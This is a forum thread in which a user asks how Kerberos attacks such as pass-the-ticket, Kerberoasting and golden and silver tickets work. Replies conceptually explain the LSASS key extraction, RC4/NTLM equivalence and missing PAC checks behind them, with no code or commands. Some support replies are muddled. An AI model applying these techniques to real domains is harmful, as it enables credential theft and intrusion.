locked
Kerberos Attacks Questions RRS feed

  • Question

  • Hey, It's amazing how many "Attacks on Kerberos" articles exist out there and almost none really explains the small details.

    My guess is that usually they assume it's basic knowledge and sometimes, they just don't know enough.

    Anyway, here are the questions:

    1. How is PtT (Pass the Ticket) possible? You can easily take someone's ticket but to use it you need to create an Authenticator, which means you need to get one of the keys that the client possess (it depends on which step you are in) and even forge the IP address embedded in the ticket stolen.
    2. It does not sound reasonable to me that given access to client's computer memory, you would extract only Kerberos tickets and no session keys or clear text/hashed passwords. 
    3. If only Kerberos is used, where am I going to find any NTLM hash to commit OPtH (Over-Pass the Hash)?
    4. They encryption of RC4_HMAC_MD4 is not used by default in nowadays windows operation systems, so how would I use NTLM hash in OPtH? Is downgrade the answer?
    5. I read in some article, that kerberoast's brute-force phase is done by trying different NTLM hashes. It seemed weird, so I assumed that it is done by trying clear text passwords which will be used to generate NTLM hashes which will be used in their turn as keys in order to try decrypt the ticket's encryption. But that's not suppose to be the case, RC4_HMAC_MD4 is not used by default. AES does, and it has PBKDF2 as a hash algorithm (which suppose to be BF resistant).
    6. How is Silver Ticket is done when the victim sever does check the PAC against the DC?
    7. Golden Ticket attack builds on the TGS to cooperate with any given TGT? Which means that it will sign on the PAC even if its forged?

    Thank you all.

    If there is another forum similar to TechNet please let me know.

    Sunday, December 23, 2018 4:44 PM

All replies

  • Hey, It's amazing how many "Attacks on Kerberos" articles exist out there and almost none really explains the small details.

    My guess is that usually they assume it's basic knowledge and sometimes, they just don't know enough.

    Anyway, here are the questions:

    1. How is PtT (Pass the Ticket) possible? You can easily take someone's ticket but to use it you need to create an Authenticator, which means you need to get one of the keys that the client possess (it depends on which step you are in) and even forge the IP address embedded in the ticket stolen.
    2. It does not sound reasonable to me that given access to client's computer memory, you would extract only Kerberos tickets and no session keys or clear text/hashed passwords. 
    3. If only Kerberos is used, where am I going to find any NTLM hash to commit OPtH (Over-Pass the Hash)?
    4. They encryption of RC4_HMAC_MD4 is not used by default in nowadays windows operation systems, so how would I use NTLM hash in OPtH? Is downgrade the answer?
    5. I read in some article, that kerberoast's brute-force phase is done by trying different NTLM hashes. It seemed weird, so I assumed that it is done by trying clear text passwords which will be used to generate NTLM hashes which will be used in their turn as keys in order to try decrypt the ticket's encryption. But that's not suppose to be the case, RC4_HMAC_MD4 is not used by default. AES does, and it has PBKDF2 as a hash algorithm (which suppose to be BF resistant).
    6. How is Silver Ticket is done when the victim sever does check the PAC against the DC?
    7. Golden Ticket attack builds on the TGS to cooperate with any given TGT? Which means that it will sign on the PAC even if its forged?

    Thank you all.

    If there is another forum similar to TechNet please let me know.

    • Merged by Kallen Wang Monday, December 24, 2018 1:38 AM the same
    Sunday, December 23, 2018 8:20 PM
  • Hello,

    This is a quick note to let you know that I am currently performing research on this issue and will get back to you as soon as possible. I appreciate your patience.

    If you have any updates during this process, please feel free to let me know.

    Thank you for your understanding and support.

    Best Regards,

    Kallen


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Monday, December 24, 2018 9:47 AM
  • Hi

    Since this issue is a bit complicated, we are working to solve it for you. And we would provide answers as soon as possible.

    For question 1, about Pass the Ticket, please refer to the following link for more information:

    https://attack.mitre.org/techniques/T1097/

    Please Note: Since the web site is not hosted by Microsoft, the link may change without notice. Microsoft does not guarantee the accuracy of this information.

    Thanks for your support and understanding.

    Best regards,

    Kallen


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Wednesday, December 26, 2018 9:29 AM
  • Hey,

    First of all, I thank you.

    Now, I don't see why it's complicated. I'm quite new to those subject, but those questions are suppose to be the very basic of it.


    As for question 1, the articles does mention in any way, the creation of authenticator message. 

    "In this technique, valid Kerberos tickets for Valid Accounts are captured by Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access."


    Credential Dumping includes getting secret keys?

    Writing that service ticket, by itself, allows access to resource, is misleading. Same for tgt.

    *EDIT*

    I found this thread:

    https://social.technet.microsoft.com/Forums/en-US/f1c0f823-bf4f-40f3-880a-b746f5df1053/passing-tickets-kerberos?forum=winserversecurity

    "In any case, I got the answer from Delpy a few month ago who noted that when Mimikatz extracts the tickets it also extracts the session key from memory which later on is used to create an authenticator."

    Notice the confusing, misleading answer by Ondrej Sevecek(over 5000 Points account in this website). Probably you can only trust the the exploiters to tell the truth at whole.

    *EDIT*

    Thank you.





    • Edited by Beit Dagan Thursday, December 27, 2018 4:46 PM
    Wednesday, December 26, 2018 8:52 PM
  • Hey, It's amazing how many "Attacks on Kerberos" articles exist out there and almost none really explains the small details.

    My guess is that usually they assume it's basic knowledge and sometimes, they just don't know enough.

    Anyway, here are the questions:

    1. How is PtT (Pass the Ticket) possible? You can easily take someone's ticket but to use it you need to create an Authenticator, which means you need to get one of the keys that the client possess (it depends on which step you are in) and even forge the IP address embedded in the ticket stolen.
    2. It does not sound reasonable to me that given access to client's computer memory, you would extract only Kerberos tickets and no session keys or clear text/hashed passwords. 
    3. If only Kerberos is used, where am I going to find any NTLM hash to commit OPtH (Over-Pass the Hash)?
    4. They encryption of RC4_HMAC_MD4 is not used by default in nowadays windows operation systems, so how would I use NTLM hash in OPtH? Is downgrade the answer?
    5. I read in some article, that kerberoast's brute-force phase is done by trying different NTLM hashes. It seemed weird, so I assumed that it is done by trying clear text passwords which will be used to generate NTLM hashes which will be used in their turn as keys in order to try decrypt the ticket's encryption. But that's not suppose to be the case, RC4_HMAC_MD4 is not used by default. AES does, and it has PBKDF2 as a hash algorithm (which suppose to be BF resistant).
    6. How is Silver Ticket is done when the victim sever does check the PAC against the DC?
    7. Golden Ticket attack builds on the TGS to cooperate with any given TGT? Which means that it will sign on the PAC even if its forged?

    Thank you all.

    If there is another forum similar to TechNet please let me know.

    1. The ticket and its (session) key are stored in the same place: LSASS memory ;
    2. You're right, technically I extract a KRB-CRED structure (ticket + key) ;
    3. I never seen any real life environment without NTLM at all, but even if so, the RC4 key for Kerberos in Windows is equal to the NTLM hash ;
    4. Right, but even if RC4 not used by default, it's kept for compatibility in memory/delegation ticket ;
    5. Kerberoast is working by asking a TGS with explicit RC4 encryption, this is why NTLM stuff can be used against the encryption (cleartext to NTLM hash to try to decrypt first 16 bytes of encrypted part of the ticket) ;
    6. Silver ticket is not working when PAC is verified, but as mentionned in many talk, basically all Windows services don't check PAC ;
    7. I don't understand the question, a Golden Ticket is a forged TGT (krbtgt key for both signatures) sent to the KDC (DC) to obtain as many TGS you want for all services.

    I hope all is crystal clear, if not, do not hesitate to ping me for clarifications.


    • Edited by Gentil Kiwi Saturday, December 29, 2018 12:07 AM typo
    Friday, December 28, 2018 9:04 PM
  • Hey, It's amazing how many "Attacks on Kerberos" articles exist out there and almost none really explains the small details.

    My guess is that usually they assume it's basic knowledge and sometimes, they just don't know enough.

    Anyway, here are the questions:

    1. How is PtT (Pass the Ticket) possible? You can easily take someone's ticket but to use it you need to create an Authenticator, which means you need to get one of the keys that the client possess (it depends on which step you are in) and even forge the IP address embedded in the ticket stolen.
    2. It does not sound reasonable to me that given access to client's computer memory, you would extract only Kerberos tickets and no session keys or clear text/hashed passwords. 
    3. If only Kerberos is used, where am I going to find any NTLM hash to commit OPtH (Over-Pass the Hash)?
    4. They encryption of RC4_HMAC_MD4 is not used by default in nowadays windows operation systems, so how would I use NTLM hash in OPtH? Is downgrade the answer?
    5. I read in some article, that kerberoast's brute-force phase is done by trying different NTLM hashes. It seemed weird, so I assumed that it is done by trying clear text passwords which will be used to generate NTLM hashes which will be used in their turn as keys in order to try decrypt the ticket's encryption. But that's not suppose to be the case, RC4_HMAC_MD4 is not used by default. AES does, and it has PBKDF2 as a hash algorithm (which suppose to be BF resistant).
    6. How is Silver Ticket is done when the victim sever does check the PAC against the DC?
    7. Golden Ticket attack builds on the TGS to cooperate with any given TGT? Which means that it will sign on the PAC even if its forged?

    Thank you all.

    If there is another forum similar to TechNet please let me know.

    1. The ticket and its (session) key are stored in the same place: LSASS memory ;
    2. You're right, technically I extract a KRB-CRED structure (ticket + key) ;
    3. I never seen any real life environment without NTLM at all, but even if so, the RC4 key for Kerberos in Windows is equal to the NTLM hash ;
    4. Right, but even if RC4 not used by default, it's kept for compatibility in memory/delegation ticket ;
    5. Kerberoast is working by asking a TGS with explicit RC4 encryption, this is why NTLM stuff can be used against the encryption (cleartext to NTLM hash to try to decrypt first 16 bytes of encrypted part of the ticket) ;
    6. Silver ticket is not working when PAC is verified, but as mentionned in many talk, basically all Windows services don't check PAC ;
    7. I don't understand the question, a Golden Ticket is a forged TGT (krbtgt key for both signatures) sent to the KDC (DC) to obtain as many TGS you want for all services.

    I hope all is crystal clear, if not, do not hesitate to ping me for clarifications.


    Almost all crystal clear. Just a few loose ends.

    5. Is RC4 the easiest etype to bruteforce?

    7. You forge a TGT (and the PAC inside), you send it to the KDC(TGS) and it should take the PAC within and copy to the New Service Ticket. But no checks are done? It signs the PAC with the target server secret so I thought It will do the extra mile and do a check to insure the PAC is valid.

    Do you know the PAC is inserted in the TGT in the first place, seems a bit unnecessary.

    Just for the luck (no related to the subject). TGS_REQ where the sname is krbtgt - happens a lot in my network, what's the deal?

    Saturday, December 29, 2018 12:36 PM
  • Hi,

    Before we go future, let me explain the Kerberos authentication more detailly for you:

    Kerberos authentication will have below 6 steps as normal, I will explain these 6 steps if we want to access the shared folder in Active directory environment.

    Let’s assume there is user A who log in client B, want to access the shared folder in C, there is DC D in our active directory, the Kerberos authentication steps are as below:

    AS Phase:

    1. User A will send AS request to DC D include:
      1. UPN
      2. Domain name which user belong to
      3. Pre-Authentication encrypted with user’s password hashed
    2. DC D will hashed the user’s password and decrypted the Pre-Authentication, in Pre-Authentication, A time stamp will be verified, if less than 5 mins, verified pass, if more than 5 mins, failed.
    3. DC D will reply the message to client B with below information:
      1. User’s password hashed ticked and TGS session Key
      2. TGS key hashed TGT, TGT include TGS Session key and Authorization data.
    4. Client A will decrypted the ticket, get TGS session key.

    TGT Phase:

    1. Client send the TGS request to DC D include:
      1. SPN of server C
      2. The domain name of target server C
      3. TGT
      4. New time stamp encrypted with TGS session key
    2. DC D will decrypted the TGT with TGS key, get the TGS session key, decrypted the new time stamp with TGS session key to verified the time whether less than 5 mins or not, if less then 5 mins, pass, more then 5 mins, failed.
    3. DC D will reply the message to client A include:
      1. Ticket and new session key( used for communication between client A and target server C) encrypted with TGS session key
      2. Service ticket encrypted with service key( from target server C), include new session key and Authorization data from TGT
    4. Client A will decrypted with TGS session key and get ticket and new session key, and service ticket encrypted with service key.

    AP Phase:

    1. Client A will send request to server C include:
      1. Flag to determine whether we will use session key.
      2. Flag to determine whether need to two-sides authentication
      3. Service ticket
      4. New time stamp encrypted with new session key
    2. Server C will decrypted the service ticket with it’s service key and get new session key, then decrypted the new time stamp with new session key, if the time less then 5 mins, then pass, otherwise failed.

    Answer your question:

    May I know you PAC means “Authorization data”? if yes, then PAC will not be vailed.

    The PAC is DC D released to client A in AS phase, then client A will send the PAC to target server C in AP phase finally, only target server C get this PAC, target C will confirm client A is trusted.

    The sname Krbtgt, this service account is default account for KDC service.

    Best Regards ,

    Kallen


    Please remember to mark the replies as answers if they help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Friday, January 4, 2019 6:53 AM